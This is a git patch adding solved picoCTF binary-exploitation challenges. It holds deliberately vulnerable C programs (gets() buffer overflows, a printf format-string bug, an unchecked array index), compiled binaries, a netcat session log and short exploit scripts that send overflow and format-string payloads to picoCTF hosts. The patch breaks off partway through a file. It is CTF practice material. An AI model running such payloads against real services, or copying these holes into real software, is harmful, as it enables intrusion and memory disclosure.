From 532e0931224d10771334e1c0d6e04dc50654c9b6 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Sun, 1 Sep 2024 22:01:27 +0200 Subject: [PATCH] pwn: add already solved challenges --- pwn/basic_file_exploit/netcat.log | 21 +++ pwn/basic_file_exploit/program-redacted.c | 195 ++++++++++++++++++++++ pwn/buffer_overflow_0/flag.txt | 1 + pwn/buffer_overflow_0/solve.sh | 3 + pwn/buffer_overflow_0/vuln | Bin 0 -> 16016 bytes pwn/buffer_overflow_0/vuln.c | 44 +++++ pwn/clutter_overflow/chall | Bin 0 -> 12704 bytes pwn/clutter_overflow/chall.c | 54 ++++++ pwn/clutter_overflow/flag.txt | 1 + pwn/clutter_overflow/solve.py | 31 ++++ pwn/cve_xxxx_xxxx/flag.txt | 1 + pwn/stonks/solve.py | 43 +++++ pwn/stonks/vuln.c | 148 ++++++++++++++++ 13 files changed, 542 insertions(+) create mode 100644 pwn/basic_file_exploit/netcat.log create mode 100644 pwn/basic_file_exploit/program-redacted.c create mode 100644 pwn/buffer_overflow_0/flag.txt create mode 100755 pwn/buffer_overflow_0/solve.sh create mode 100755 pwn/buffer_overflow_0/vuln create mode 100644 pwn/buffer_overflow_0/vuln.c create mode 100755 pwn/clutter_overflow/chall create mode 100644 pwn/clutter_overflow/chall.c create mode 100644 pwn/clutter_overflow/flag.txt create mode 100755 pwn/clutter_overflow/solve.py create mode 100644 pwn/cve_xxxx_xxxx/flag.txt create mode 100755 pwn/stonks/solve.py create mode 100644 pwn/stonks/vuln.c diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log new file mode 100644 index 0000000..9fd7e40 --- /dev/null +++ b/pwn/basic_file_exploit/netcat.log @@ -0,0 +1,21 @@ +$ nc saturn.picoctf.net 51109 +Hi, welcome to my echo chamber! +Type '1' to enter a phrase into our database +Type '2' to echo a phrase in our database +Type '3' to exit the program +1 +1 +Please enter your data: +asdf +asdf +Please enter the length of your data: +4 +4 +Your entry number is: 1 +Write successful, would you like to do anything else? +2 +2 +Please enter the entry number of your data: +0 +0 +picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0} diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c new file mode 100644 index 0000000..ad40974 --- /dev/null +++ b/pwn/basic_file_exploit/program-redacted.c @@ -0,0 +1,195 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define WAIT 60 + + +static const char* flag = "[REDACTED]"; + +static char data[10][100]; +static int input_lengths[10]; +static int inputs = 0; + + + +int tgetinput(char *input, unsigned int l) +{ + fd_set input_set; + struct timeval timeout; + int ready_for_reading = 0; + int read_bytes = 0; + + if( l <= 0 ) + { + printf("'l' for tgetinput must be greater than 0\n"); + return -2; + } + + + /* Empty the FD Set */ + FD_ZERO(&input_set ); + /* Listen to the input descriptor */ + FD_SET(STDIN_FILENO, &input_set); + + /* Waiting for some seconds */ + timeout.tv_sec = WAIT; // WAIT seconds + timeout.tv_usec = 0; // 0 milliseconds + + /* Listening for input stream for any activity */ + ready_for_reading = select(1, &input_set, NULL, NULL, &timeout); + /* Here, first parameter is number of FDs in the set, + * second is our FD set for reading, + * third is the FD set in which any write activity needs to updated, + * which is not required in this case. + * Fourth is timeout + */ + + if (ready_for_reading == -1) { + /* Some error has occured in input */ + printf("Unable to read your input\n"); + return -1; + } + + if (ready_for_reading) { + read_bytes = read(0, input, l-1); + if(input[read_bytes-1]=='\n'){ + --read_bytes; + input[read_bytes]='\0'; + } + if(read_bytes==0){ + printf("No data given.\n"); + return -4; + } else { + return 0; + } + } else { + printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n"); + return -3; + } + + return 0; +} + + +static void data_write() { + char input[100]; + char len[4]; + long length; + int r; + + printf("Please enter your data:\n"); + r = tgetinput(input, 100); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + while (true) { + printf("Please enter the length of your data:\n"); + r = tgetinput(len, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((length = strtol(len, NULL, 10)) == 0) { + puts("Please put in a valid length"); + } else { + break; + } + } + + if (inputs > 10) { + inputs = 0; + } + + strcpy(data[inputs], input); + input_lengths[inputs] = length; + + printf("Your entry number is: %d\n", inputs + 1); + inputs++; +} + + +static void data_read() { + char entry[4]; + long entry_number; + char output[100]; + int r; + + memset(output, '\0', 100); + + printf("Please enter the entry number of your data:\n"); + r = tgetinput(entry, 4); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((entry_number = strtol(entry, NULL, 10)) == 0) { + puts(flag); + fseek(stdin, 0, SEEK_END); + exit(0); + } + + entry_number--; + strncpy(output, data[entry_number], input_lengths[entry_number]); + puts(output); +} + + +int main(int argc, char** argv) { + char input[3] = {'\0'}; + long command; + int r; + + puts("Hi, welcome to my echo chamber!"); + puts("Type '1' to enter a phrase into our database"); + puts("Type '2' to echo a phrase in our database"); + puts("Type '3' to exit the program"); + + while (true) { + r = tgetinput(input, 3); + // Timeout on user input + if(r == -3) + { + printf("Goodbye!\n"); + exit(0); + } + + if ((command = strtol(input, NULL, 10)) == 0) { + puts("Please put in a valid number"); + } else if (command == 1) { + data_write(); + puts("Write successful, would you like to do anything else?"); + } else if (command == 2) { + if (inputs == 0) { + puts("No data yet"); + continue; + } + data_read(); + puts("Read successful, would you like to do anything else?"); + } else if (command == 3) { + return 0; + } else { + puts("Please type either 1, 2 or 3"); + puts("Maybe breaking boundaries elsewhere will be helpful"); + } + } + + return 0; +} diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/buffer_overflow_0/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh new file mode 100755 index 0000000..defe7bf --- /dev/null +++ b/pwn/buffer_overflow_0/solve.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443 diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln new file mode 100755 index 0000000000000000000000000000000000000000..e4e63e14afea88a0d1c6f3c8215cddff4b735005 GIT binary patch literal 16016 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 Vy&@!GhWQo@3=%L&Xjp*M0RYx}_fh}= literal 0 HcmV?d00001 diff --git a/pwn/buffer_overflow_0/vuln.c b/pwn/buffer_overflow_0/vuln.c new file mode 100644 index 0000000..ddeb1b5 --- /dev/null +++ b/pwn/buffer_overflow_0/vuln.c @@ -0,0 +1,44 @@ +#include +#include +#include +#include + +#define FLAGSIZE_MAX 64 + +char flag[FLAGSIZE_MAX]; + +void sigsegv_handler(int sig) { + printf("%s\n", flag); + fflush(stdout); + exit(1); +} + +void vuln(char *input){ + char buf2[16]; + strcpy(buf2, input); +} + +int main(int argc, char **argv){ + + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(flag,FLAGSIZE_MAX,f); + signal(SIGSEGV, sigsegv_handler); // Set up signal handler + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + + printf("Input: "); + fflush(stdout); + char buf1[100]; + gets(buf1); + vuln(buf1); + printf("The program will exit now\n"); + return 0; +} diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall new file mode 100755 index 0000000000000000000000000000000000000000..c37dc1d37638a598eb6334e83065bb89f18c9005 GIT binary patch literal 12704 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 literal 0 HcmV?d00001 diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c new file mode 100644 index 0000000..a5c070f --- /dev/null +++ b/pwn/clutter_overflow/chall.c @@ -0,0 +1,54 @@ +#include +#include + +#define SIZE 0x100 +#define GOAL 0xdeadbeef + +const char* HEADER = +" ______________________________________________________________________\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n" +"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n" +"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n" +"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n" +"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n" +"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n" +".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n" +"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n" +"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n" +"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n" +"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n" +"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""; + +int main(void) +{ + long code = 0; + char clutter[SIZE]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(HEADER); + puts("My room is so cluttered..."); + puts("What do you see?"); + + gets(clutter); + + + if (code == GOAL) { + printf("code == 0x%llx: how did that happen??\n", GOAL); + puts("take a flag for your troubles"); + system("cat flag.txt"); + } else { + printf("code == 0x%llx\n", code); + printf("code != 0x%llx :(\n", GOAL); + } + + return 0; +} diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/clutter_overflow/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py new file mode 100755 index 0000000..2a489b4 --- /dev/null +++ b/pwn/clutter_overflow/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("chall") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.DEBUG: + gdb.attach(r) + else: + r = remote("mars.picoctf.net", 31890) + + return r + + +def main(): + r = conn() + # gdb.attach(r, 'break *main+143') + print(r.recvuntil(b'What do you see?\n')) + r.sendline((b'A' * 264) + p64(0xdeadbeef)) + print(r.recvall().decode()) + + +if __name__ == "__main__": + main() diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt new file mode 100644 index 0000000..c8eaedd --- /dev/null +++ b/pwn/cve_xxxx_xxxx/flag.txt @@ -0,0 +1 @@ +CVE-2021-34527 diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py new file mode 100755 index 0000000..b3312e5 --- /dev/null +++ b/pwn/stonks/solve.py @@ -0,0 +1,43 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +ADDR = "mercury.picoctf.net 59616" +HOST, PORT = ADDR.split(" ") + +def main(): + for x in range(1,2): + r = remote(HOST, PORT) + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.recvline() + r.sendline(b'1') + r.recvline() + r.recvline() + r.recvline() + + # r.sendline(f'%{x}$s'.encode()) + # print(f'%{x}$s'.encode()) + r.sendline(b"%x." * 99 + b"%x") + r.recvline() + result = r.recvline() + print(result) + unpacked = [] + for x in result.strip().split(b"."): + x = int(x, 16) + print(x) + unpacked.extend([ + (x & 0x000000FF), + (x & 0x0000FF00) >> 8, + (x & 0x00FF0000) >> 16, + (x & 0xFF000000) >> 24, + ]) + for x in unpacked: + if x >= ord('!') and x <= ord('~'): + print(chr(x), end='') + +if __name__ == "__main__": + main() diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c new file mode 100644 index 0000000..5b385a2 --- /dev/null +++ b/pwn/stonks/vuln.c @@ -0,0 +1,148 @@ +#include +#include +#include +#include + +#define FLAG_BUFFER 128 +#define MAX_SYM_LEN 4 + +typedef struct Stonks { + int shares; + char symbol[MAX_SYM_LEN + 1]; + struct Stonks *next; +} Stonk; + +typedef struct Portfolios { + int money; + Stonk *head; +} Portfolio; + +int view_portfolio(Portfolio *p) { + if (!p) { + return 1; + } + printf("\nPortfolio as of "); + fflush(stdout); + system("date"); // TODO: implement this in C + fflush(stdout); + + printf("\n\n"); + Stonk *head = p->head; + if (!head) { + printf("You don't own any stonks!\n"); + } + while (head) { + printf("%d shares of %s\n", head->shares, head->symbol); + head = head->next; + } + return 0; +} + +Stonk *pick_symbol_with_AI(int shares) { + if (shares < 1) { + return NULL; + } + Stonk *stonk = malloc(sizeof(Stonk)); + stonk->shares = shares; + + int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1; + for (int i = 0; i <= MAX_SYM_LEN; i++) { + if (i < AI_symbol_len) { + stonk->symbol[i] = 'A' + (rand() % 26); + } else { + stonk->symbol[i] = '\0'; + } + } + + stonk->next = NULL; + + return stonk; +} + +int buy_stonks(Portfolio *p) { + if (!p) { + return 1; + } + char api_buf[FLAG_BUFFER]; + FILE *f = fopen("api","r"); + if (!f) { + printf("Flag file not found. Contact an admin.\n"); + exit(1); + } + fgets(api_buf, FLAG_BUFFER, f); + + int money = p->money; + int shares = 0; + Stonk *temp = NULL; + printf("Using patented AI algorithms to buy stonks\n"); + while (money > 0) { + shares = (rand() % money) + 1; + temp = pick_symbol_with_AI(shares); + temp->next = p->head; + p->head = temp; + money -= shares; + } + printf("Stonks chosen\n"); + + // TODO: Figure out how to read token from file, for now just ask + + char *user_buf = malloc(300 + 1); + printf("What is your API token?\n"); + scanf("%300s", user_buf); + printf("Buying stonks with token:\n"); + printf(user_buf); + + // TODO: Actually use key to interact with API + + view_portfolio(p); + + return 0; +} + +Portfolio *initialize_portfolio() { + Portfolio *p = malloc(sizeof(Portfolio)); + p->money = (rand() % 2018) + 1; + p->head = NULL; + return p; +} + +void free_portfolio(Portfolio *p) { + Stonk *current = p->head; + Stonk 